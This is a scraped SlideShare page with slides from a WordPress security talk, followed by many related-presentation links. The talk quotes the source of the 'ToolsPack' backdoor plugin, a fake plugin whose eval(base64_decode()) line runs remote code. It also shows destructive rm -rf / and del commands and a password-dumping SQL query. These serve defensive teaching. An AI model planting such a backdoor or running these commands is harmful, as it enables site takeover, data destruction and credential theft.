SlideShare ist ein Scribd-Unternehmen logo

Intro to Wordpress Security

Chris Dodds
Chris Dodds

A brief overview of security concepts to give context to the threats facing Wordpress users.

Technologie
1 von 16
Downloaden Sie, um offline zu lesen
Intro to Wordpress Security Prepared for the Oklahoma City Wordpress User Group by Chris Dodds
Chris Dodds Owner & Principal Advisor at Focusfire IT Strategy & Consulting Features: Ten+ years of experience across multiple industries and IT disciplines. Certifications: CISSP System Requirements: Food, water, & MCITP:SA internet connectivity. Security+ Network+
This talk is not about the top 5 WP security threats.
Let’s talk about Betty.
Betty’s Fancy Blog o’ Gnomes Betty’s Betty’s Fancy Betty’s Fancy Fancy Server Employer Audience
It’s not about you, Betty.
The Players Script kiddies Hacktivists Pro Criminals Information Warriors
Enumeration Access Exploitation
Password Attacks Exploit weak passwords Dictionary based Can be entirely automated
ToolsPack Plugin toolspack.php <?php /* Plugin  Name:  ToolsPack Description:  Supercharge  your  WordPress  site  with  powerful  features   previously  only  available  to  WordPress.com  users.  core  release.  Keep  the   plugin  updated! Version:  1.2 Author:  Mark  Stain Author  URI:  http://checkWPTools.com/ */ $_REQUEST[e]  ?  EVAL(  base64_decode(  $_REQUEST[e]  )  )  :  exit; ?> Source - http://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.html
This backdoor code allows the remote user to: Execute commands on you server $WINDIR ? `del /F/S/Q $WINDIR*` : `rm -rf /`; Execute commands against your WP database SELECT login + '-' + password FROM users
More Likely... Payload - keylogger, trojan, spyware, virus SEO Spam - links, keywords “garden gnomes, free chaps, leather sale, cheap sex, porn, prescription drugs, coupons, free avon”
Best Practices Update! Update! Update! Backup & test your backups. Use a unique passphrase. Don’t use the “admin” user. Disable or delete un-used plugins.
These are all things your attacker will do once they control your site.
Recommended Plugins Backup BackWPup - open-source or BackupBuddy - commercial Security Better WP Security - open-source Limit Login Attempts - open-source Sucuri SiteCheck Scanner - http://sitecheck.sucuri.net/
Contact and Q&A Chris Dodds e-mail - chris.dodds@focusfire.net twitter - @doddschris web - chrisdodds.net

Empfohlen

Basics for Securing WordPress
Basics for Securing WordPressBasics for Securing WordPress
Basics for Securing WordPressmiss604
 
Locking down word press
Locking down word pressLocking down word press
Locking down word pressZachary Russell
 
8 Ways to Hack a WordPress website
8 Ways to Hack a WordPress website8 Ways to Hack a WordPress website
8 Ways to Hack a WordPress websiteSiteGround.com
 
My Top WordPress Plugins
My Top WordPress PluginsMy Top WordPress Plugins
My Top WordPress PluginsJoe Casabona
 
Protect Your WordPress From The Inside Out
Protect Your WordPress From The Inside OutProtect Your WordPress From The Inside Out
Protect Your WordPress From The Inside OutSiteGround.com
 
Locking Down Your WordPress Site
Locking Down Your WordPress SiteLocking Down Your WordPress Site
Locking Down Your WordPress SiteFrank Corso
 
How To Lock Down And Secure Your Wordpress
How To Lock Down And Secure Your WordpressHow To Lock Down And Secure Your Wordpress
How To Lock Down And Secure Your WordpressChelsea O'Brien
 
HOW TO PROTECT YOUR WORDPRESS WEBSITE FROM HACKERS
HOW TO PROTECT YOUR WORDPRESS WEBSITE FROM HACKERSHOW TO PROTECT YOUR WORDPRESS WEBSITE FROM HACKERS
HOW TO PROTECT YOUR WORDPRESS WEBSITE FROM HACKERSElsner Technologies Pvt Ltd
 

Empfohlen

Basics for Securing WordPress
Basics for Securing WordPressBasics for Securing WordPress
Basics for Securing WordPressmiss604
 
Locking down word press
Locking down word pressLocking down word press
Locking down word pressZachary Russell
 
8 Ways to Hack a WordPress website
8 Ways to Hack a WordPress website8 Ways to Hack a WordPress website
8 Ways to Hack a WordPress websiteSiteGround.com
 
My Top WordPress Plugins
My Top WordPress PluginsMy Top WordPress Plugins
My Top WordPress PluginsJoe Casabona
 
Protect Your WordPress From The Inside Out
Protect Your WordPress From The Inside OutProtect Your WordPress From The Inside Out
Protect Your WordPress From The Inside OutSiteGround.com
 
Locking Down Your WordPress Site
Locking Down Your WordPress SiteLocking Down Your WordPress Site
Locking Down Your WordPress SiteFrank Corso
 
How To Lock Down And Secure Your Wordpress
How To Lock Down And Secure Your WordpressHow To Lock Down And Secure Your Wordpress
How To Lock Down And Secure Your WordpressChelsea O'Brien
 
HOW TO PROTECT YOUR WORDPRESS WEBSITE FROM HACKERS
HOW TO PROTECT YOUR WORDPRESS WEBSITE FROM HACKERSHOW TO PROTECT YOUR WORDPRESS WEBSITE FROM HACKERS
HOW TO PROTECT YOUR WORDPRESS WEBSITE FROM HACKERSElsner Technologies Pvt Ltd
 
Joomla Security v3.0
Joomla Security v3.0Joomla Security v3.0
Joomla Security v3.0Ajay Lulia
 
WordPress Security Presentation from South Florida WordPress Meetup
WordPress Security Presentation from South Florida WordPress MeetupWordPress Security Presentation from South Florida WordPress Meetup
WordPress Security Presentation from South Florida WordPress MeetupJohn Carcutt
 
WordPress Security WordCamp OC 2013
WordPress Security WordCamp OC 2013WordPress Security WordCamp OC 2013
WordPress Security WordCamp OC 2013Brad Williams
 
WORDPRESS SECURITY: HOW TO AVOID BEING HACKED
WORDPRESS SECURITY: HOW TO AVOID BEING HACKEDWORDPRESS SECURITY: HOW TO AVOID BEING HACKED
WORDPRESS SECURITY: HOW TO AVOID BEING HACKEDStuartJDavidson.com
 
WordPress Security - Kulpreet Singh
WordPress Security - Kulpreet SinghWordPress Security - Kulpreet Singh
WordPress Security - Kulpreet Singhguest4fe370
 
WordPress Security 101 for developers
WordPress Security 101 for developersWordPress Security 101 for developers
WordPress Security 101 for developersRan Bar-Zik
 
Wordpress security issues
Wordpress security issuesWordpress security issues
Wordpress security issuesDeepu Thomas
 
Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Vlad Lasky
 
WordPress Security 101
WordPress Security 101WordPress Security 101
WordPress Security 101Shady A. Sharaf
 
Beating Spam On Your WordPress Website - WordCamp Melbourne 2013
Beating Spam On Your WordPress Website - WordCamp Melbourne 2013Beating Spam On Your WordPress Website - WordCamp Melbourne 2013
Beating Spam On Your WordPress Website - WordCamp Melbourne 2013Vlad Lasky
 
WordPress Security 2018
WordPress Security 2018WordPress Security 2018
WordPress Security 2018Adrian Mikeliunas
 
WordPress Security Best Practices 2019 Update
WordPress Security Best Practices 2019 UpdateWordPress Security Best Practices 2019 Update
WordPress Security Best Practices 2019 UpdateZero Point Development
 
RUNNING A SECURITY CHECK FOR YOUR WORDPRESS SITE
RUNNING A SECURITY CHECK FOR YOUR WORDPRESS SITERUNNING A SECURITY CHECK FOR YOUR WORDPRESS SITE
RUNNING A SECURITY CHECK FOR YOUR WORDPRESS SITEAcodez IT Solutions
 
WordPress Security Essential Tips & Tricks
WordPress Security Essential Tips & TricksWordPress Security Essential Tips & Tricks
WordPress Security Essential Tips & TricksFaraz Ahmed
 
Computer Security and the Web (1)
Computer Security and the Web (1)Computer Security and the Web (1)
Computer Security and the Web (1)Richard Stone
 
WordPress and the Enterprise
WordPress and the EnterpriseWordPress and the Enterprise
WordPress and the EnterprisePrasad Ajinkya
 
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012Nir Goldshlager
 
IBM Cognos 10.2 Security Best Practices
IBM Cognos 10.2 Security Best PracticesIBM Cognos 10.2 Security Best Practices
IBM Cognos 10.2 Security Best PracticesPerformanceG2, Inc.
 
WordPress Security Hardening
WordPress Security HardeningWordPress Security Hardening
WordPress Security HardeningIda Bagus Budanthara
 
Wordpress Security & Hardening Steps
Wordpress Security & Hardening StepsWordpress Security & Hardening Steps
Wordpress Security & Hardening StepsPlasterdog Web Design
 
Chloe Dash: The digitisation of Main Incidents in the married Life of Hermann...
Chloe Dash: The digitisation of Main Incidents in the married Life of Hermann...Chloe Dash: The digitisation of Main Incidents in the married Life of Hermann...
Chloe Dash: The digitisation of Main Incidents in the married Life of Hermann...Oxford Trainees
 
CILIP Future Skills Project - presentation to L&SE CDG AGM
CILIP Future Skills Project - presentation to L&SE CDG AGMCILIP Future Skills Project - presentation to L&SE CDG AGM
CILIP Future Skills Project - presentation to L&SE CDG AGMBethan Ruddock
 

Weitere ähnliche Inhalte

Was ist angesagt?

Joomla Security v3.0
Joomla Security v3.0Joomla Security v3.0
Joomla Security v3.0Ajay Lulia
 
WordPress Security Presentation from South Florida WordPress Meetup
WordPress Security Presentation from South Florida WordPress MeetupWordPress Security Presentation from South Florida WordPress Meetup
WordPress Security Presentation from South Florida WordPress MeetupJohn Carcutt
 
WordPress Security WordCamp OC 2013
WordPress Security WordCamp OC 2013WordPress Security WordCamp OC 2013
WordPress Security WordCamp OC 2013Brad Williams
 
WORDPRESS SECURITY: HOW TO AVOID BEING HACKED
WORDPRESS SECURITY: HOW TO AVOID BEING HACKEDWORDPRESS SECURITY: HOW TO AVOID BEING HACKED
WORDPRESS SECURITY: HOW TO AVOID BEING HACKEDStuartJDavidson.com
 
WordPress Security - Kulpreet Singh
WordPress Security - Kulpreet SinghWordPress Security - Kulpreet Singh
WordPress Security - Kulpreet Singhguest4fe370
 
WordPress Security 101 for developers
WordPress Security 101 for developersWordPress Security 101 for developers
WordPress Security 101 for developersRan Bar-Zik
 
Wordpress security issues
Wordpress security issuesWordpress security issues
Wordpress security issuesDeepu Thomas
 
Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Vlad Lasky
 
Beating Spam On Your WordPress Website - WordCamp Melbourne 2013
Beating Spam On Your WordPress Website - WordCamp Melbourne 2013Beating Spam On Your WordPress Website - WordCamp Melbourne 2013
Beating Spam On Your WordPress Website - WordCamp Melbourne 2013Vlad Lasky
 
WordPress Security Best Practices 2019 Update
WordPress Security Best Practices 2019 UpdateWordPress Security Best Practices 2019 Update
WordPress Security Best Practices 2019 UpdateZero Point Development
 
RUNNING A SECURITY CHECK FOR YOUR WORDPRESS SITE
RUNNING A SECURITY CHECK FOR YOUR WORDPRESS SITERUNNING A SECURITY CHECK FOR YOUR WORDPRESS SITE
RUNNING A SECURITY CHECK FOR YOUR WORDPRESS SITEAcodez IT Solutions
 
WordPress Security Essential Tips & Tricks
WordPress Security Essential Tips & TricksWordPress Security Essential Tips & Tricks
WordPress Security Essential Tips & TricksFaraz Ahmed
 
Computer Security and the Web (1)
Computer Security and the Web (1)Computer Security and the Web (1)
Computer Security and the Web (1)Richard Stone
 
WordPress and the Enterprise
WordPress and the EnterpriseWordPress and the Enterprise
WordPress and the EnterprisePrasad Ajinkya
 
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012Nir Goldshlager
 
IBM Cognos 10.2 Security Best Practices
IBM Cognos 10.2 Security Best PracticesIBM Cognos 10.2 Security Best Practices
IBM Cognos 10.2 Security Best PracticesPerformanceG2, Inc.
 
Wordpress Security & Hardening Steps
Wordpress Security & Hardening StepsWordpress Security & Hardening Steps
Wordpress Security & Hardening StepsPlasterdog Web Design
 

Was ist angesagt? (20)

Joomla Security v3.0
Joomla Security v3.0Joomla Security v3.0
Joomla Security v3.0
 
WordPress Security Presentation from South Florida WordPress Meetup
WordPress Security Presentation from South Florida WordPress MeetupWordPress Security Presentation from South Florida WordPress Meetup
WordPress Security Presentation from South Florida WordPress Meetup
 
WordPress Security WordCamp OC 2013
WordPress Security WordCamp OC 2013WordPress Security WordCamp OC 2013
WordPress Security WordCamp OC 2013
 
WORDPRESS SECURITY: HOW TO AVOID BEING HACKED
WORDPRESS SECURITY: HOW TO AVOID BEING HACKEDWORDPRESS SECURITY: HOW TO AVOID BEING HACKED
WORDPRESS SECURITY: HOW TO AVOID BEING HACKED
 
WordPress Security - Kulpreet Singh
WordPress Security - Kulpreet SinghWordPress Security - Kulpreet Singh
WordPress Security - Kulpreet Singh
 
WordPress Security 101 for developers
WordPress Security 101 for developersWordPress Security 101 for developers
WordPress Security 101 for developers
 
Wordpress security issues
Wordpress security issuesWordpress security issues
Wordpress security issues
 
Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011
 
WordPress Security 101
WordPress Security 101WordPress Security 101
WordPress Security 101
 
Beating Spam On Your WordPress Website - WordCamp Melbourne 2013
Beating Spam On Your WordPress Website - WordCamp Melbourne 2013Beating Spam On Your WordPress Website - WordCamp Melbourne 2013
Beating Spam On Your WordPress Website - WordCamp Melbourne 2013
 
WordPress Security 2018
WordPress Security 2018WordPress Security 2018
WordPress Security 2018
 
WordPress Security Best Practices 2019 Update
WordPress Security Best Practices 2019 UpdateWordPress Security Best Practices 2019 Update
WordPress Security Best Practices 2019 Update
 
RUNNING A SECURITY CHECK FOR YOUR WORDPRESS SITE
RUNNING A SECURITY CHECK FOR YOUR WORDPRESS SITERUNNING A SECURITY CHECK FOR YOUR WORDPRESS SITE
RUNNING A SECURITY CHECK FOR YOUR WORDPRESS SITE
 
WordPress Security Essential Tips & Tricks
WordPress Security Essential Tips & TricksWordPress Security Essential Tips & Tricks
WordPress Security Essential Tips & Tricks
 
Computer Security and the Web (1)
Computer Security and the Web (1)Computer Security and the Web (1)
Computer Security and the Web (1)
 
WordPress and the Enterprise
WordPress and the EnterpriseWordPress and the Enterprise
WordPress and the Enterprise
 
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
 
IBM Cognos 10.2 Security Best Practices
IBM Cognos 10.2 Security Best PracticesIBM Cognos 10.2 Security Best Practices
IBM Cognos 10.2 Security Best Practices
 
WordPress Security Hardening
WordPress Security HardeningWordPress Security Hardening
WordPress Security Hardening
 
Wordpress Security & Hardening Steps
Wordpress Security & Hardening StepsWordpress Security & Hardening Steps
Wordpress Security & Hardening Steps
 

Andere mochten auch

Chloe Dash: The digitisation of Main Incidents in the married Life of Hermann...
Chloe Dash: The digitisation of Main Incidents in the married Life of Hermann...Chloe Dash: The digitisation of Main Incidents in the married Life of Hermann...
Chloe Dash: The digitisation of Main Incidents in the married Life of Hermann...Oxford Trainees
 
CILIP Future Skills Project - presentation to L&SE CDG AGM
CILIP Future Skills Project - presentation to L&SE CDG AGMCILIP Future Skills Project - presentation to L&SE CDG AGM
CILIP Future Skills Project - presentation to L&SE CDG AGMBethan Ruddock
 
From QEH to LoC - Lauren & Ruth
From QEH to LoC - Lauren & RuthFrom QEH to LoC - Lauren & Ruth
From QEH to LoC - Lauren & RuthOxford Trainees
 
"Many Happy Returns!": A Digital Archive of the Birthday Book of George Clari...
"Many Happy Returns!": A Digital Archive of the Birthday Book of George Clari..."Many Happy Returns!": A Digital Archive of the Birthday Book of George Clari...
"Many Happy Returns!": A Digital Archive of the Birthday Book of George Clari...Oxford Trainees
 
Business Building Presentatie Feb 2011
Business Building Presentatie Feb 2011Business Building Presentatie Feb 2011
Business Building Presentatie Feb 2011mfvandefliert
 

Andere mochten auch (6)

Chloe Dash: The digitisation of Main Incidents in the married Life of Hermann...
Chloe Dash: The digitisation of Main Incidents in the married Life of Hermann...Chloe Dash: The digitisation of Main Incidents in the married Life of Hermann...
Chloe Dash: The digitisation of Main Incidents in the married Life of Hermann...
 
CILIP Future Skills Project - presentation to L&SE CDG AGM
CILIP Future Skills Project - presentation to L&SE CDG AGMCILIP Future Skills Project - presentation to L&SE CDG AGM
CILIP Future Skills Project - presentation to L&SE CDG AGM
 
From QEH to LoC - Lauren & Ruth
From QEH to LoC - Lauren & RuthFrom QEH to LoC - Lauren & Ruth
From QEH to LoC - Lauren & Ruth
 
Interview guide
Interview guideInterview guide
Interview guide
 
"Many Happy Returns!": A Digital Archive of the Birthday Book of George Clari...
"Many Happy Returns!": A Digital Archive of the Birthday Book of George Clari..."Many Happy Returns!": A Digital Archive of the Birthday Book of George Clari...
"Many Happy Returns!": A Digital Archive of the Birthday Book of George Clari...
 
Business Building Presentatie Feb 2011
Business Building Presentatie Feb 2011Business Building Presentatie Feb 2011
Business Building Presentatie Feb 2011
 

Ähnlich wie Intro to Wordpress Security

Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Laskywordcampgc
 
Simple Ways to Secure and Maintain Your WordPress Website
Simple Ways to Secure and Maintain Your WordPress WebsiteSimple Ways to Secure and Maintain Your WordPress Website
Simple Ways to Secure and Maintain Your WordPress WebsiteRich Plakas
 
Higher Order WordPress Security
Higher Order WordPress SecurityHigher Order WordPress Security
Higher Order WordPress SecurityDougal Campbell
 
A Guide To Secure WordPress Website – A Complete Guide.pdf
A Guide To Secure WordPress Website – A Complete Guide.pdfA Guide To Secure WordPress Website – A Complete Guide.pdf
A Guide To Secure WordPress Website – A Complete Guide.pdfHost It Smart
 
WordPress End-User Security
WordPress End-User SecurityWordPress End-User Security
WordPress End-User SecurityDre Armeda
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beau Bullock
 
Types of Security Threats WordPress Websites Face: Part-1
Types of Security Threats WordPress Websites Face: Part-1Types of Security Threats WordPress Websites Face: Part-1
Types of Security Threats WordPress Websites Face: Part-1WPWhiteBoard
 
Securing your WordPress Website - Vlad Lasky - WordCamp Sydney 2012
Securing your WordPress Website - Vlad Lasky - WordCamp Sydney 2012Securing your WordPress Website - Vlad Lasky - WordCamp Sydney 2012
Securing your WordPress Website - Vlad Lasky - WordCamp Sydney 2012WordCamp Sydney
 
Securing Your WordPress Website - WordCamp Sydney 2012
Securing Your WordPress Website - WordCamp Sydney 2012Securing Your WordPress Website - WordCamp Sydney 2012
Securing Your WordPress Website - WordCamp Sydney 2012Vlad Lasky
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012ZIONSECURITY
 
Top Ten WordPress Security Tips for 2012
Top Ten WordPress Security Tips for 2012Top Ten WordPress Security Tips for 2012
Top Ten WordPress Security Tips for 2012Brad Williams
 
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)Hardening WordPress - SAScon Manchester 2013 (WordPress Security)
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)Bastian Grimm
 
Your WordPress Website Is/Not Hacked
Your WordPress Website Is/Not HackedYour WordPress Website Is/Not Hacked
Your WordPress Website Is/Not HackedAngela Bowman
 

Ähnlich wie Intro to Wordpress Security (20)

Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Lasky
 
Simple Ways to Secure and Maintain Your WordPress Website
Simple Ways to Secure and Maintain Your WordPress WebsiteSimple Ways to Secure and Maintain Your WordPress Website
Simple Ways to Secure and Maintain Your WordPress Website
 
WordPress Security Best Practices
WordPress Security Best PracticesWordPress Security Best Practices
WordPress Security Best Practices
 
Higher Order WordPress Security
Higher Order WordPress SecurityHigher Order WordPress Security
Higher Order WordPress Security
 
WordPress security
WordPress securityWordPress security
WordPress security
 
WordPress Security Best Practices
WordPress Security Best PracticesWordPress Security Best Practices
WordPress Security Best Practices
 
A Guide To Secure WordPress Website – A Complete Guide.pdf
A Guide To Secure WordPress Website – A Complete Guide.pdfA Guide To Secure WordPress Website – A Complete Guide.pdf
A Guide To Secure WordPress Website – A Complete Guide.pdf
 
WordPress End-User Security
WordPress End-User SecurityWordPress End-User Security
WordPress End-User Security
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
 
Types of Security Threats WordPress Websites Face: Part-1
Types of Security Threats WordPress Websites Face: Part-1Types of Security Threats WordPress Websites Face: Part-1
Types of Security Threats WordPress Websites Face: Part-1
 
WordPress Security
WordPress SecurityWordPress Security
WordPress Security
 
Securing your WordPress Website - Vlad Lasky - WordCamp Sydney 2012
Securing your WordPress Website - Vlad Lasky - WordCamp Sydney 2012Securing your WordPress Website - Vlad Lasky - WordCamp Sydney 2012
Securing your WordPress Website - Vlad Lasky - WordCamp Sydney 2012
 
Securing Your WordPress Website - WordCamp Sydney 2012
Securing Your WordPress Website - WordCamp Sydney 2012Securing Your WordPress Website - WordCamp Sydney 2012
Securing Your WordPress Website - WordCamp Sydney 2012
 
WordPress Security
WordPress Security WordPress Security
WordPress Security
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012
 
Top Ten WordPress Security Tips for 2012
Top Ten WordPress Security Tips for 2012Top Ten WordPress Security Tips for 2012
Top Ten WordPress Security Tips for 2012
 
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)Hardening WordPress - SAScon Manchester 2013 (WordPress Security)
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)
 
Your WordPress Website Is/Not Hacked
Your WordPress Website Is/Not HackedYour WordPress Website Is/Not Hacked
Your WordPress Website Is/Not Hacked
 
WordPress Security Guide
WordPress Security GuideWordPress Security Guide
WordPress Security Guide
 
Bridging the Gap
Bridging the GapBridging the Gap
Bridging the Gap
 

Kürzlich hochgeladen

The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxBkGupta21
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 

Kürzlich hochgeladen (20)

The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
